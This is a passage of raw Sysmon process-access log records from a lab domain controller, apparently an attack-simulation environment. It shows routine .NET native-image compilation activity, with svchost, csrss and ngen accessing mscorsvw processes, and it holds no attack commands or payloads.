ow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.915{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-0304-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.900{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4657-6000-0304-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.900{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-0304-000000009A01}4164C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.837{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-0204-000000009A01}2444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.822{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4657-6000-0204-000000009A01}2444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.822{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-0204-000000009A01}2444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.728{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-0104-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.712{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4657-6000-0104-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.712{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-0104-000000009A01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.665{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-0004-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.650{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4657-6000-0004-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.650{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-0004-000000009A01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.572{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-FF03-000000009A01}604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.556{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4657-6000-FF03-000000009A01}604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.556{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-FF03-000000009A01}604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.509{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-FE03-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.494{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4657-6000-FE03-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.494{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-FE03-000000009A01}2220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.431{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-FD03-000000009A01}2704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.415{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4657-6000-FD03-000000009A01}2704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.415{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-FD03-000000009A01}2704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.353{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-FC03-000000009A01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.337{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4657-6000-FC03-000000009A01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 